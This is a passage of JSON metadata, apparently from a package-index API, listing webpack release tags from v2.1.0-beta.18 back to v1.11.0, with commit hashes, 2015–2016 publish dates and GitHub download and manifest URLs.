ack/tar.gz/v2.1.0-beta.18","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.18","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.18","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.18","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.18/manifests"},{"name":"v2.1.0-beta.17","sha":"bc29455e92f4b760db745775a4fca5cde0d01d23","kind":"tag","published_at":"2016-07-13T12:04:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.17","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.17","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.17","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.17","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.17/manifests"},{"name":"v2.1.0-beta.16","sha":"90d537ef4ce1092f76bd02ee2a75838c67b809fc","kind":"tag","published_at":"2016-07-13T09:11:53.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.16","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.16","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.16","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.16","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.16/manifests"},{"name":"v2.1.0-beta.15","sha":"2829516da95a3bb2fe7dde76013f80f0f7e22dbb","kind":"tag","published_at":"2016-06-28T23:23:25.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.15","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.15/manifests"},{"name":"v2.1.0-beta.14","sha":"6748dca837b6402f056b6ac94ffc3c99f8a25c36","kind":"tag","published_at":"2016-06-24T00:02:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.14","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.14/manifests"},{"name":"v2.1.0-beta.13","sha":"36e4fd2348381d578c43abcbd15ef39a78b5bc07","kind":"tag","published_at":"2016-06-07T22:25:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.13","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.13/manifests"},{"name":"v2.1.0-beta.12","sha":"3580ec93f8ac7b999fc2faa4bccad31fe6ae5331","kind":"tag","published_at":"2016-06-05T21:02:25.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.12","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.12/manifests"},{"name":"v2.1.0-beta.11","sha":"0b1f08022681be796612542c7d0d3c736564a4ff","kind":"tag","published_at":"2016-06-05T18:52:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.11","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.11/manifests"},{"name":"v2.1.0-beta.10","sha":"2343af44bb4314bafc1ba29cd019bc4b28edbcbf","kind":"tag","published_at":"2016-06-05T18:19:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.10","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.10/manifests"},{"name":"v2.1.0-beta.9","sha":"dc3bd055027d8d1ebbb0ebdd07fb73387a0ab6d1","kind":"tag","published_at":"2016-06-04T18:19:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.9","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.9/manifests"},{"name":"v2.1.0-beta.8","sha":"abf0cefd592700a19856c3ef9b6d65f905ec73c1","kind":"tag","published_at":"2016-05-29T18:53:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.8","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.8/manifests"},{"name":"v1.13.1","sha":"01ea02a95cf8c446fd1dc9e82fae0febe9332034","kind":"tag","published_at":"2016-05-20T06:48:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.13.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.13.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.13.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.13.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.13.1/manifests"},{"name":"v2.1.0-beta.7","sha":"9162f9e6eea62137139f95b8aaedee335c870edd","kind":"tag","published_at":"2016-05-06T22:00:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.7","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.7/manifests"},{"name":"v2.1.0-beta.6","sha":"ca8b693c2c17bd06778476381fae23b3b21c0475","kind":"tag","published_at":"2016-04-21T23:03:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.6","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.6/manifests"},{"name":"v1.13.0","sha":"006d59500de0493c4096d5d4cecd64eb12db2b95","kind":"tag","published_at":"2016-04-15T13:18:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.13.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.13.0/manifests"},{"name":"v1.12.15","sha":"ee1b8c43b474b22a20bfc25daf0ee153dfb2ef9f","kind":"tag","published_at":"2016-04-10T22:47:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.15","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.15/manifests"},{"name":"v2.1.0-beta.5","sha":"54405b59b1dd9724e145d4d16726a926042d0e1d","kind":"tag","published_at":"2016-04-10T22:45:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.5","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.5/manifests"},{"name":"v2.1.0-beta.4","sha":"c5cc1d25a2a4c0fabdec49a86b3bc62a5d637729","kind":"tag","published_at":"2016-02-24T22:58:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.4","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.4/manifests"},{"name":"v2.1.0-beta.3","sha":"13f8b690f0eb9e6058c10631e01e54fb88cd7143","kind":"tag","published_at":"2016-02-22T22:06:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.3","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.3/manifests"},{"name":"v1.12.14","sha":"3ed27836b488401a7e9be2de1491a868a8b6f123","kind":"tag","published_at":"2016-02-22T22:04:46.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.14","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.14/manifests"},{"name":"v2.1.0-beta.2","sha":"69d0d2e4cfe9545d530c4e1bcb59ea01969a9908","kind":"tag","published_at":"2016-02-22T14:31:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.2","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.2/manifests"},{"name":"v2.1.0-beta.1","sha":"fd1e68f5826743b72590e8a97bcfb3d7f78745dd","kind":"tag","published_at":"2016-02-22T12:29:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.1","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.1/manifests"},{"name":"v2.1.0-beta.0","sha":"52822286a347bf525eeab7f035341fc25e857914","kind":"tag","published_at":"2016-02-22T08:44:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.0","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.0/manifests"},{"name":"v1.12.13","sha":"668a5f0bc68cad70c5182ebcab8b3b1a340e038d","kind":"tag","published_at":"2016-02-04T14:41:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.13","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.13/manifests"},{"name":"v2.0.7-beta","sha":"432bf35df499e09585c0efeedb3ddbed337d3ed9","kind":"tag","published_at":"2016-02-04T13:46:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.0.7-beta","html_url":"https://github.com/webpack/webpack/releases/tag/v2.0.7-beta","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.0.7-beta","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.7-beta","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.7-beta/manifests"},{"name":"v2.0.6-beta","sha":"71f0945a81e83cc87026d62424f504d00dc6aec3","kind":"tag","published_at":"2016-01-30T12:24:07.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.0.6-beta","html_url":"https://github.com/webpack/webpack/releases/tag/v2.0.6-beta","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.0.6-beta","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.6-beta","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.6-beta/manifests"},{"name":"v2.0.5-beta","sha":"ac45c3c1a4c9b51eceecba79c6ae1a60887368de","kind":"tag","published_at":"2016-01-26T17:20:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.0.5-beta","html_url":"https://github.com/webpack/webpack/releases/tag/v2.0.5-beta","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.0.5-beta","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.5-beta","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.5-beta/manifests"},{"name":"v1.12.12","sha":"c0420f1ca8e2a444a5b5192a58d88d8d7d710bb7","kind":"tag","published_at":"2016-01-23T12:49:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.12","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.12/manifests"},{"name":"v2.0.4-beta","sha":"bba8afdeef79a7c6e1be6688107fdff3109463bc","kind":"tag","published_at":"2016-01-21T18:19:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.0.4-beta","html_url":"https://github.com/webpack/webpack/releases/tag/v2.0.4-beta","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.0.4-beta","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.4-beta","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.4-beta/manifests"},{"name":"v2.0.3-beta","sha":"b7754b645e50608165e0a28ca4735cd0efcfa0d9","kind":"tag","published_at":"2016-01-21T18:16:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.0.3-beta","html_url":"https://github.com/webpack/webpack/releases/tag/v2.0.3-beta","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.0.3-beta","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.3-beta","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.3-beta/manifests"},{"name":"v1.12.11","sha":"ab433884f140d694241c54e9c6f9de7f049aec6d","kind":"tag","published_at":"2016-01-11T18:14:23.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.11","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.11/manifests"},{"name":"v1.12.10","sha":"66142f2f89868b8e380c4883513cb974680e20e2","kind":"tag","published_at":"2016-01-06T19:29:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.10","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.10/manifests"},{"name":"v2.0.2-beta","sha":"0915889feb8558a07b053010e56748566e108285","kind":"tag","published_at":"2015-12-22T11:53:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.0.2-beta","html_url":"https://github.com/webpack/webpack/releases/tag/v2.0.2-beta","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.0.2-beta","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.2-beta","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.2-beta/manifests"},{"name":"v2.0.1-beta","sha":"11932d75a4c8034e5d8afb50985159d33fdb8ddc","kind":"tag","published_at":"2015-11-24T07:28:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.0.1-beta","html_url":"https://github.com/webpack/webpack/releases/tag/v2.0.1-beta","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.0.1-beta","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.1-beta","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.1-beta/manifests"},{"name":"v1.12.9","sha":"9766f2bde3c3f3e7b3b0e914c9cb81ea3a12e823","kind":"tag","published_at":"2015-11-24T07:09:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.9/manifests"},{"name":"v1.12.8","sha":"b59528164913d1234e9dccc55bdfbba2e75767d2","kind":"tag","published_at":"2015-11-20T20:32:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.8/manifests"},{"name":"v1.12.7","sha":"a6c4414a7f38d8098f128bc50e8c83ed4a9de607","kind":"tag","published_at":"2015-11-20T19:32:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.7/manifests"},{"name":"v1.12.6","sha":"7c3e68e8df03cdcef7a6102f61ed4b8cc91cda78","kind":"tag","published_at":"2015-11-14T08:29:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.6/manifests"},{"name":"v1.12.5","sha":"3266bbcd16f8a80c35fcd518bf2fb2fe8997692c","kind":"tag","published_at":"2015-11-13T21:25:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.5/manifests"},{"name":"v1.12.4","sha":"530f669e13770ccf5082f29dbde1b114e6173a07","kind":"tag","published_at":"2015-11-10T20:29:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.4/manifests"},{"name":"v1.12.3","sha":"f3d65ef1b5a6ebba85083536e3a705fe96d31220","kind":"tag","published_at":"2015-11-06T00:10:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.3/manifests"},{"name":"v2.0.0-beta","sha":"b2ba75b4c4360b0f14cb23fdb66355457de6f810","kind":"commit","published_at":"2015-11-01T22:46:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.0.0-beta","html_url":"https://github.com/webpack/webpack/releases/tag/v2.0.0-beta","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.0.0-beta","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.0-beta","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.0-beta/manifests"},{"name":"v1.12.2","sha":"89fda6a575eb379d974a30a5229d74c77ba35cc5","kind":"tag","published_at":"2015-09-16T21:13:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.2/manifests"},{"name":"v1.12.1","sha":"cfcac5e3b62a52012318204dc798d7394e9ac6a9","kind":"tag","published_at":"2015-09-03T12:26:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.1/manifests"},{"name":"v1.12.0","sha":"f155f32271ff81fee546c86b5685803377cebc09","kind":"tag","published_at":"2015-08-25T08:41:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.0/manifests"},{"name":"v1.11.0","sha":"5335781be8c06c2ff9443431a196f6a94ca80bb3","kind":"tag","published_at":"2015-08-06T11:30:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.11.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.